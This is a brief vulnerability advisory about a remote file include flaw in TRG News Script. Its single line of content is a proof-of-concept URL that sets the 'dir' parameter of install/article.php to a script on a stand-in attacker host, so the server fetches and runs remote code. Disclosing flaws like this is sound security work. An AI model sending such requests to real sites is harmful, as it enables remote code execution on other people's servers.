TRG News Script Remote File Include Vulnerability

TRG News Script Remote File Include Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

http://www.example.com/trg_news30/trgnews/install/article.php?dir=http://www.example.org/attackerScript.php